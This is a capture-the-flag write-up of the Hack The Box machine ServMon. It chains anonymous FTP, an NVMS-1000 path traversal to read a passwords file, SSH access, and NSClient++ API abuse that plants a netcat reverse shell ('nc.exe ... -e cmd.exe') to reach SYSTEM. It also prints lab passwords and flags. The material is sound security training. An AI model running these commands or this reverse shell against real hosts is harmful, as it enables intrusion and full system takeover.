Hack The Box Write-Up ServMon - 10.10.10.184
Post
Cancel

# Hack The Box Write-Up ServMon - 10.10.10.184

Monitoring is not protection.

Myself

In this post, I’m writing a write-up for the machine ServMon from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

ServMon is a ‘Easy’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 10 and submitting the root flag you points will be raised by 20.

Foothold

After the port scan, I found some interesting open ports, like 21/tcp (FTP), 80/tcp (HTTP) and 8443/tcp (alt-HTTPS). Anonymous FTP login is allowed and through FTP I found in the folder of Nathan a txt-file with the message that there is a passwords.txt file placed on his Desktop. Then, I checked the service on the HTTP port and it seems that the NVMS-1000 software has a Path Traversal vulnerability.

User

Through the Path Traversal vulnerability, I was able to read the passwords.txt file from the Desktop of Nathan and establish an SSH connection with the user account of Nadine and grab the user flag.

Root

I checked the 8443/tcp port and found that the software NSClient++ is running on this box. After checking the version of NSClient++ I found that there is a known vulnerability for this particular version. Through the API I was able to put a revshell.bat in the scripts folder and execute this file. The reverse shell was established with Local System privileges.

# Recon

## Port scan with Nmap

1 nmap -sC -sV -oA ./nmap/servmon.txt 10.10.10.184 

The results of the port scan.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-11 15:14 EDT Nmap scan report for 10.10.10.184 Host is up (0.063s latency). Not shown: 991 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_01-18-20 12:05PM <DIR> Users | ftp-syst: |_ SYST: Windows_NT 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0) | ssh-hostkey: | 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA) | 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA) |_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519) 80/tcp open http | fingerprint-strings: | GetRequest, HTTPOptions, RTSPRequest: | HTTP/1.1 200 OK | Content-type: text/html | Content-Length: 340 | Connection: close | AuthInfo: | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | <html xmlns="http://www.w3.org/1999/xhtml"> | <head> | <title></title> | <script type="text/javascript"> | window.location.href = "Pages/login.htm"; | </script> | </head> | <body> | </body> | </html> | NULL: | HTTP/1.1 408 Request Timeout | Content-type: text/html | Content-Length: 0 | Connection: close |_ AuthInfo: |_http-title: Site doesn't have a title (text/html). 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5666/tcp open tcpwrapped 6699/tcp open napster? 8443/tcp open ssl/https-alt | fingerprint-strings: | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: | HTTP/1.1 404 | Content-Length: 18 | Document not found | GetRequest: | HTTP/1.1 302 | Content-Length: 0 | Location: /index.html | workers |_ jobs | http-title: NSClient++ |_Requested resource was /index.html | ssl-cert: Subject: commonName=localhost | Not valid before: 2020-01-14T13:24:20 |_Not valid after: 2021-01-13T13:24:20 |_ssl-date: TLS randomness does not represent time 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.80%I=7%D=4/11%Time=5E921736%P=x86_64-pc-linux-gnu%r(NULL SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\. SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\ SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20 SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2 SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n") SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\ SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\ SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1 SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\ SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20 SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\ SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1- SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2 SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\ SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=4/11%Time=5E92173E%P=x86_64-pc-linux-gn SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0t\0t\0\0\0\0\0\0\0\0\0\0\0 SF:\0\0\0\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x18\ SF:x02\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x20 SF:18\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\ SF:x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTS SF:PRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\ SF:x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\ SF:x2018\r\n\r\nDocument\x20not\x20found"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 2m29s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-04-11T19:19:20 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 154.74 seconds 

There are some interesting ports open:

1. 21/tcp (FTP)
2. 22/tcp (SSH)
3. 80/TCP (HTTP)
4. 8443/tcp (alternative HTTPS)

Let’s go for the low hanging fruit first. Anonymous access for FTP is allowed, let’s check that first and let’s directly login as anonymous with the default password anonymous.

1 2 3 4 5 6 7 8 9 ~ftp 10.10.10.184 Connected to 10.10.10.184. 220 Microsoft FTP Service Name (10.10.10.184:kali): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> 

Let’s poke some around.

1 2 3 4 5 6 7 8 9 10 11 12 13 ftp> dir 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 12:05PM <DIR> Users 226 Transfer complete. ftp> cd users 250 CWD command successful. ftp> ls 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 12:06PM <DIR> Nadine 01-18-20 12:08PM <DIR> Nathan 226 Transfer complete. 

I got two user folders Nadine and Nathan. From the directory Nadine I have downloaded a file called Confidential.txt and from the folder of Nathan I downloaded the file Notes to do.txt.

Confidential.txt
This file contains a note from someone with the note that there is a password.txt file left on his desktop. Furthermore, this file is pointing to some secure folder.

1 2 3 4 5 Nathan, I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder. Regards 

[: file=’Confidential.txt’]

Notes to do.txt
This is an unfinished todo list of Nathan.

1 2 3 4 5 1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePoint 

There are no more files for now, let’s checking the other open ports.

## NVMS-1000

The next port in the enumeration phase is the HTTP port. I visited the webpage http://10.10.10.184. I landed on a login page of NVMS-1000. This web server is hosting Network Surveillance Management Software. NVMS-1000 is a monitoring client that is specially designed for network video surveillance.

Maybe I have already found the name of this box: ServMon, Server Monitoring?

I have tried some default username and password combinations, but they are not working. After searching some around on the internet I found that a specific version of NVMS-1000 is vulnerable for Directory Traversal according to this article: https://www.exploit-db.com/exploits/47774. CVE-2019-20085 was assigned to this vulnerability.

I checked this with Burpsuite and I found that this NVMS-1000 is vulnerable for directory traversal attack. I tried to read the /windows/win.ini, every time when the GET is failing I add a extra /../.

Ok, now I need to put the pieces together.

# Intrusion

I know that there is on the desktop of Nathan a file called passwords.txt. As the NVMS-1000 has a Path Traversal vulnerability I could get that file and grab the passwords.

I have now a list of passwords. I placed all of this passwords in a file called passwords.txt.

1 2 3 4 5 6 7 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe [email protected] 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$ As the SSH port is open I tried first to get an SSH shell as the user Nathan but the passwords are not working for his account. Then I’ve switched to the user account Nadine and managed to get a shell with the password [email protected]. Get the user flag and I can go to the next step: privilege escalation. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ~$ ssh [email protected] Microsoft Windows &#91;Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. [email protected] C:\Users\Nadine>cd Desktop [email protected] C:\Users\Nadine\Desktop>dir Volume in drive C has no label. Volume Serial Number is 728C-D22C Directory of C:\Users\Nadine\Desktop 08/04/2020 22:28 <DIR> . 08/04/2020 22:28 <DIR> .. 15/04/2020 20:51 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 27,418,095,616 bytes free [email protected] C:\Users\Nadine\Desktop>type user.txt 7f26c77e1ccd17cede33c1b950c26e4e [email protected] C:\Users\Nadine\Desktop> 

# Privilege Escalation

## Enumeration

There is a non-default port open on this box, this the port 8443/tcp (alt-https). When I visit this web page through the URL https://10.10.10.184:8443 I landed on the Sign In page of NSClient++. I tried to log in with the passwords I already know, but none of them are working. They are all resulting in a 403 Your not allowed notification.

I have already an active SSH session with the user account Nadine. Let’s try to find out which version of NSClient++ this box is running and I need to find the password. On the Documentation webpage from NSClient++ (https://docs.nsclient.org/). I found how I can grab the web administrator password.

1 2 3 4 5 6 7 8 9 [email protected] C:\Users\Nadine>powershell Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. Try the new cross-platform PowerShell https://aka.ms/pscore6 PS C:\Users\Nadine> cd 'C:\Program Files\NSClient++\' PS C:\Program Files\NSClient++> .\nscp.exe web password --display Current password: ew2x6SsGTxjRwXOT 

So, the password is ew2x6SsGTxjRwXOT. With the command below I can check the current installed version of NSClient++.

1 2 3 4 5 6 7 8 9 10 11 12 13 PS C:\Program Files\NSClient++> .\nscp.exe --version NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64 I know that this box is running NSClient++, I know the password and the version of this software. This has to be the way to root this box. Through searchsploit, I checked if there is a known vulnerability for this version of NSClient++ and it seems the case. ~$searchsploit nsclient++ -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- NSClient++ 0.5.2.35 - Privilege Escalation | exploits/windows/local/46802.txt -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result  On this webpage of exploit-db: https://www.exploit-db.com/exploits/46802 there is an explanation about how to get a reverse shell with Local System privileges. # Explotation ## NSClient++ I found out there are two ways to root this box: 1. Through the GUI 2. or through the API I’m new to API and I want to learn something, so I choose the API way, in my opinion the easiest way to root this box. I checked the API documentation of NSClient++ for the commands. I started by removing the curl alias in Powershell because it refers to the Invoke-WebRequest cmdlet in Powershell. I do not want to use this cmdlet. 1 PS C:\Program Files\NSClient++> Remove-Item alias:curl  First, I checked if I can call the API throuh the SSH session of Nadine. And it worked. 1 2 3 4 5 PS C:\Users\Nadine> curl -k -u admin https://localhost:8443/api/v1 │ Enter host password for user 'admin': │ {"info_url":"https://localhost:8443/api/v1/info","logs_url":"https://localhost:8443/api/v1/logs","modules_url":"https│ ://localhost:8443/api/v1/modules","queries_url":"https://localhost:8443/api/v1/queries","scripts_url":"https://localh│ ost:8443/api/v1/scripts"}  As CheckExternalScripts and Scheduler are enabled already, I only have to place the script in the C:\Program Files\NSClient++\Scripts directory through the API and run this script. I invoked the command below and placed a reverse shell script, named revshell.bat. Of course, I placed the nc.exe file in the C:\Temp directory. 1 curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/revshell.bat --data-binary "C:\Temp\nc.exe 10.10.14.42 4444 -e cmd.exe"  With this command I call the script. 1 curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/revshell/commands/execute?time=3m  The reverse shell is established and I can now grab the root flag. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ~$ nc -lvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.184. Ncat: Connection from 10.10.10.184:50184. Microsoft Windows &#91;Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. C:\Program Files\NSClient++>whoami whoami nt authority\system C:\Program Files\NSClient++>type "C:\Users\Administrator\Desktop\root.txt" type "C:\Users\Administrator\Desktop\root.txt" d3d0930a47b35c8ae6ff3689411bf7ad C:\Program Files\NSClient++> 

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856.com/profile/224856. Thanks!

Happy Hacking :-)